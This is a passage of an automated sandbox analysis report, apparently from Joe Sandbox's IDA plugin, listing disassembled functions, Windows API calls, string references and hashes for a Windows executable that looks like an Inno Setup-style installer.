                                                                                      • Part of subcall function 004085BC: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004087BE,?,?,?,00000000,00408970), ref: 004085CF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoLocale$DefaultSystem
                                                                                    • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                    • API String ID: 1044490935-665933166
                                                                                    • Opcode ID: 77a209930b2735c0ddecf28fb65780fc2527dfa24ec1165d9e089488809fe89d
                                                                                    • Instruction ID: 5b8a50df068a6b2da3a3ead13541c1976fd8fe610af15afaced6bb711b513b54
                                                                                    • Opcode Fuzzy Hash: 77a209930b2735c0ddecf28fb65780fc2527dfa24ec1165d9e089488809fe89d
                                                                                    • Instruction Fuzzy Hash: 35513024B00108ABD701FBA69D41A9E77A9DB94304F50C07FA441BB3C6DE3DDE15875E
                                                                                    APIs
                                                                                    • GetVersion.KERNEL32(00000000,00411909), ref: 0041179C
                                                                                    • InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 0041185A
                                                                                      • Part of subcall function 00411ABC: CreatePopupMenu.USER32 ref: 00411AD6
                                                                                    • InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 004118E6
                                                                                      • Part of subcall function 00411ABC: CreateMenu.USER32 ref: 00411AE0
                                                                                    • InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 004118CD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$Insert$Create$ItemPopupVersion
                                                                                    • String ID: ,$?
                                                                                    • API String ID: 2359071979-2308483597
                                                                                    • Opcode ID: 57ccdcba8889ff27764a16026ea30ef1297fbdf3a800011468703812a277a737
                                                                                    • Instruction ID: bc3149483dfa03cdc0807f0a56c3f90cc05caec19bb46b1e0c32919a2f580dbf
                                                                                    • Opcode Fuzzy Hash: 57ccdcba8889ff27764a16026ea30ef1297fbdf3a800011468703812a277a737
                                                                                    • Instruction Fuzzy Hash: 95512674A00144ABDB00EF6ADC816EA7BF9AF09304B11817BFA04E73A6D738C941CB5C
                                                                                    APIs
                                                                                    • GetObjectA.GDI32(?,00000018,?), ref: 0041BF38
                                                                                    • GetObjectA.GDI32(?,00000018,?), ref: 0041BF47
                                                                                    • GetBitmapBits.GDI32(?,?,?), ref: 0041BF98
                                                                                    • GetBitmapBits.GDI32(?,?,?), ref: 0041BFA6
                                                                                    • DeleteObject.GDI32(?), ref: 0041BFAF
                                                                                    • DeleteObject.GDI32(?), ref: 0041BFB8
                                                                                    • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BFD5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Object$BitmapBitsDelete$CreateIcon
                                                                                    • String ID:
                                                                                    • API String ID: 1030595962-0
                                                                                    • Opcode ID: c1e7ff30722f84a59b7c576368abad4b11806281d6eddf659bf093bc56a2286c
                                                                                    • Instruction ID: b628a60b6e344882d317dd96d191c0cb792f95d1e2fbfe9e34044ce63643746d
                                                                                    • Opcode Fuzzy Hash: c1e7ff30722f84a59b7c576368abad4b11806281d6eddf659bf093bc56a2286c
                                                                                    • Instruction Fuzzy Hash: 48510571E00219AFCB14DFA9C8819EEBBF9EF48314B11442AF914E7391D738AD81CB64
                                                                                    APIs
                                                                                    • SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CF0E
                                                                                    • 73A14620.GDI32(00000000,00000026), ref: 0041CF2D
                                                                                    • 73A08830.GDI32(?,?,00000001,00000000,00000026), ref: 0041CF93
                                                                                    • 73A022A0.GDI32(?,?,?,00000001,00000000,00000026), ref: 0041CFA2
                                                                                    • StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041D00C
                                                                                    • StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D04A
                                                                                    • 73A08830.GDI32(?,?,00000001,0041D07C,00000000,00000026), ref: 0041D06F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Stretch$A08830$A022A14620BitsMode
                                                                                    • String ID:
                                                                                    • API String ID: 2733548868-0
                                                                                    • Opcode ID: d1728d26c473023a034cda29587c75d8a44e61feb8d5ac31eb3562e546440a0c
                                                                                    • Instruction ID: 415929d19c0355200a34ec50ec85ee50bdb26205500aadc12dd1df5ccaef5bc8
                                                                                    • Opcode Fuzzy Hash: d1728d26c473023a034cda29587c75d8a44e61feb8d5ac31eb3562e546440a0c
                                                                                    • Instruction Fuzzy Hash: 7A514EB0604200AFD714DFA9C995F9BBBF9EF08304F10859AB549DB292C779ED81CB58
                                                                                    APIs
                                                                                    • SendMessageA.USER32(00000000,?,?), ref: 00456526
                                                                                      • Part of subcall function 0042428C: GetWindowTextA.USER32(?,?,00000100), ref: 004242AC
                                                                                      • Part of subcall function 0041EEB4: GetCurrentThreadId.KERNEL32 ref: 0041EF03
                                                                                      • Part of subcall function 0041EEB4: 73A15940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042ED24,?,00000001), ref: 0041EF09
                                                                                      • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0045658D
                                                                                    • TranslateMessage.USER32(?), ref: 004565AB
                                                                                    • DispatchMessageA.USER32(?), ref: 004565B4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$TextWindow$A15940CurrentDispatchSendThreadTranslate
                                                                                    • String ID: [Paused]
                                                                                    • API String ID: 1715372110-4230553315
                                                                                    • Opcode ID: dc734b73e23721f0060ca7094c6900a610c91b21ae2acdfdba29acc3faa202e8
                                                                                    • Instruction ID: b21e1f9e90a9f2d36a55999f4aec8319d50e535270b7c0faa20aeab8e88a7384
                                                                                    • Opcode Fuzzy Hash: dc734b73e23721f0060ca7094c6900a610c91b21ae2acdfdba29acc3faa202e8
                                                                                    • Instruction Fuzzy Hash: 9B310B70904248AEDB01DBB5DC41BCE7BB8EB0D314F95407BF800E3296D67C9909CBA9
                                                                                    APIs
                                                                                    • GetCursor.USER32(00000000,0046A767), ref: 0046A6E4
                                                                                    • LoadCursorA.USER32(00000000,00007F02), ref: 0046A6F2
                                                                                    • SetCursor.USER32(00000000,00000000,00007F02,00000000,0046A767), ref: 0046A6F8
                                                                                    • Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046A767), ref: 0046A702
                                                                                    • SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046A767), ref: 0046A708
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Cursor$LoadSleep
                                                                                    • String ID: CheckPassword
                                                                                    • API String ID: 4023313301-1302249611
                                                                                    • Opcode ID: 0cd4e794cb0659d1b4c7be91935d04c2b5f54db07be9f479e0bdba40b14c3856
                                                                                    • Instruction ID: 8e453c91c0c590c9759b614a584e43fa839bbbc5a3d1c7197c153ffb71e3d1f4
                                                                                    • Opcode Fuzzy Hash: 0cd4e794cb0659d1b4c7be91935d04c2b5f54db07be9f479e0bdba40b14c3856
                                                                                    • Instruction Fuzzy Hash: 36319334640604AFD711EB69C989F9E7BE0EF05305F5580B6F844AB3A2D778EE00CB5A
                                                                                    APIs
                                                                                      • Part of subcall function 0047663C: GetWindowThreadProcessId.USER32(00000000), ref: 00476644
                                                                                      • Part of subcall function 0047663C: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,0047673B,0049B050,00000000), ref: 00476657
                                                                                      • Part of subcall function 0047663C: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0047665D
                                                                                    • SendMessageA.USER32(00000000,0000004A,00000000,00476ACE), ref: 00476749
                                                                                    • GetTickCount.KERNEL32 ref: 0047678E
                                                                                    • GetTickCount.KERNEL32 ref: 00476798
                                                                                    • MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 004767ED
                                                                                    Strings
                                                                                    • CallSpawnServer: Unexpected status: %d, xrefs: 004767D6
                                                                                    • CallSpawnServer: Unexpected response: $%x, xrefs: 0047677E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
                                                                                    • String ID: CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d
                                                                                    • API String ID: 613034392-3771334282
                                                                                    • Opcode ID: aa8cf3b1ca808e1997025c551cec6cc8e4be10c38fa863c1333764af79a3be99
                                                                                    • Instruction ID: 71a83a78c23d55d33e7515897efa00ecebce1ccd6bd4cc0fbedfc923aec738ff
                                                                                    • Opcode Fuzzy Hash: aa8cf3b1ca808e1997025c551cec6cc8e4be10c38fa863c1333764af79a3be99
                                                                                    • Instruction Fuzzy Hash: 7831C074F006149ADB10EBB9C8827EEB3E29F04304F91843BB548EB382D67C8D018B9D
                                                                                    APIs
                                                                                    • GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 00458F5F
                                                                                    Strings
                                                                                    • .NET Framework CreateAssemblyCache function failed, xrefs: 00458F82
                                                                                    • Fusion.dll, xrefs: 00458EFF
                                                                                    • CreateAssemblyCache, xrefs: 00458F56
                                                                                    • Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 00458F6A
                                                                                    • Failed to load .NET Framework DLL "%s", xrefs: 00458F44
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc
                                                                                    • String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
                                                                                    • API String ID: 190572456-3990135632
                                                                                    • Opcode ID: e7405bef0de90a1b20b21130be7ac328c98422d0360e923e9ad54989aa78f0ae
                                                                                    • Instruction ID: b0fae5d47ad60a87b9f111cdb81e12311f6487f55351a3ce1c195c50c1487ae5
                                                                                    • Opcode Fuzzy Hash: e7405bef0de90a1b20b21130be7ac328c98422d0360e923e9ad54989aa78f0ae
                                                                                    • Instruction Fuzzy Hash: 31317971E00605ABCB00DFA5C88169EB7B5AF48315F50857FE814F7382DF7899098799
                                                                                    APIs
                                                                                      • Part of subcall function 0041C058: GetObjectA.GDI32(?,00000018), ref: 0041C065
                                                                                    • GetFocus.USER32 ref: 0041C178
                                                                                    • 73A0A570.USER32(?), ref: 0041C184
                                                                                    • 73A08830.GDI32(?,?,00000000,00000000,0041C203,?,?), ref: 0041C1A5
                                                                                    • 73A022A0.GDI32(?,?,?,00000000,00000000,0041C203,?,?), ref: 0041C1B1
                                                                                    • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C1C8
                                                                                    • 73A08830.GDI32(?,00000000,00000000,0041C20A,?,?), ref: 0041C1F0
                                                                                    • 73A0A480.USER32(?,?,0041C20A,?,?), ref: 0041C1FD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: A08830$A022A480A570BitsFocusObject
                                                                                    • String ID:
                                                                                    • API String ID: 1424713005-0
                                                                                    • Opcode ID: 6a39f5637e621883ca0517ce44c3b694a92d9286788943b8a56663a62e87c7eb
                                                                                    • Instruction ID: a51b9c7cee13939b32e911f1849152ebfa7eb0d73570b73294f05c7218cf190f
                                                                                    • Opcode Fuzzy Hash: 6a39f5637e621883ca0517ce44c3b694a92d9286788943b8a56663a62e87c7eb
                                                                                    • Instruction Fuzzy Hash: A0116A71E40609BBDB10DBE9CC85FAFBBFCEF48700F54446AB518E7281D67899008B28
                                                                                    APIs
                                                                                    • GetSystemMetrics.USER32(0000000E), ref: 00418C80
                                                                                    • GetSystemMetrics.USER32(0000000D), ref: 00418C88
                                                                                    • 6F522980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C8E
                                                                                      • Part of subcall function 004099C0: 6F51C400.COMCTL32(0049A628,000000FF,00000000,00418CBC,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 004099C4
                                                                                    • 6F58CB00.COMCTL32(0049A628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418CDE
                                                                                    • 6F58C740.COMCTL32(00000000,?,0049A628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418CE9
                                                                                    • 6F58CB00.COMCTL32(0049A628,00000001,?,?,00000000,?,0049A628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000), ref: 00418CFC
                                                                                    • 6F520860.COMCTL32(0049A628,00418D1F,?,00000000,?,0049A628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E), ref: 00418D12
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: MetricsSystem$C400C740F520860F522980
                                                                                    • String ID:
                                                                                    • API String ID: 2856677924-0
                                                                                    • Opcode ID: 77375f6f841bd32482ac362321ef56034a1adac8671eb50e5d38b587b56b4f6d
                                                                                    • Instruction ID: 436211bc77980f3f3c6a2ba6eafd8e316937a2835f40b04245610037118c4977
                                                                                    • Opcode Fuzzy Hash: 77375f6f841bd32482ac362321ef56034a1adac8671eb50e5d38b587b56b4f6d
                                                                                    • Instruction Fuzzy Hash: FB1149B1744204BBDB10EBA9DC83F5E73B8DB48704F6044BABA04E72D2DA799D409759
                                                                                    APIs
                                                                                      • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                                    • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00482098), ref: 0048207D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseOpen
                                                                                    • String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
                                                                                    • API String ID: 47109696-2530820420
                                                                                    • Opcode ID: 3270de2230ad746d97d59dd4353e0cd3c44e793d3e1148cc667fa9374d6162f5
                                                                                    • Instruction ID: 2fd02ba07ad27dcdf7cb645fdb5409a97311ae270af1ac1656c6f1dc0261d506
                                                                                    • Opcode Fuzzy Hash: 3270de2230ad746d97d59dd4353e0cd3c44e793d3e1148cc667fa9374d6162f5
                                                                                    • Instruction Fuzzy Hash: 4911D030604208AADB10F6A29E02B5F7AA8DB42354F508877AA01E7292E7BE8D45D75D
                                                                                    APIs
                                                                                    • SelectObject.GDI32(00000000,?), ref: 0041B480
                                                                                    • SelectObject.GDI32(?,00000000), ref: 0041B48F
                                                                                    • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4BB
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0041B4C9
                                                                                    • SelectObject.GDI32(?,00000000), ref: 0041B4D7
                                                                                    • DeleteDC.GDI32(00000000), ref: 0041B4E0
                                                                                    • DeleteDC.GDI32(?), ref: 0041B4E9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ObjectSelect$Delete$Stretch
                                                                                    • String ID:
                                                                                    • API String ID: 1458357782-0
                                                                                    • Opcode ID: 72b6a28bf9d60e237e3396a0a8e2fc7d77968e10b7c0149e345d15a7b5d8e936
                                                                                    • Instruction ID: 28529174ed8a1a36c66279ad8c479dcd7ed434ba0fbaa502c63cdd0cc078bbc5
                                                                                    • Opcode Fuzzy Hash: 72b6a28bf9d60e237e3396a0a8e2fc7d77968e10b7c0149e345d15a7b5d8e936
                                                                                    • Instruction Fuzzy Hash: A1114C72E40559ABDF10D6D9D885FAFB3BCEF08704F048456B614FB241C678A8418B54
                                                                                    APIs
                                                                                    • 73A0A570.USER32(00000000,?,?,00000000), ref: 00493979
                                                                                      • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0049399B
                                                                                    • GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00493F19), ref: 004939AF
                                                                                    • GetTextMetricsA.GDI32(00000000,?), ref: 004939D1
                                                                                    • 73A0A480.USER32(00000000,00000000,004939FB,004939F4,?,00000000,?,?,00000000), ref: 004939EE
                                                                                    Strings
                                                                                    • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 004939A6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Text$A480A570CreateExtentFontIndirectMetricsObjectPointSelect
                                                                                    • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                                                    • API String ID: 1435929781-222967699
                                                                                    • Opcode ID: 15a797e3667a903f5c914f6a817bc36f585e6b4d828b97bd12db5e7176161fac
                                                                                    • Instruction ID: ca21cbf5bcaba7d36ec51d0fe3022430e72f204859a7c427f36f75f4196156c5
                                                                                    • Opcode Fuzzy Hash: 15a797e3667a903f5c914f6a817bc36f585e6b4d828b97bd12db5e7176161fac
                                                                                    • Instruction Fuzzy Hash: B30165B6644644AFDB00DFA9CC42F6FB7ECDB49704F514476B504E7281D6789E008B24
                                                                                    APIs
                                                                                    • GetCursorPos.USER32 ref: 004233BF
                                                                                    • WindowFromPoint.USER32(?,?), ref: 004233CC
                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004233DA
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 004233E1
                                                                                    • SendMessageA.USER32(00000000,00000084,?,?), ref: 004233FA
                                                                                    • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00423411
                                                                                    • SetCursor.USER32(00000000), ref: 00423423
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
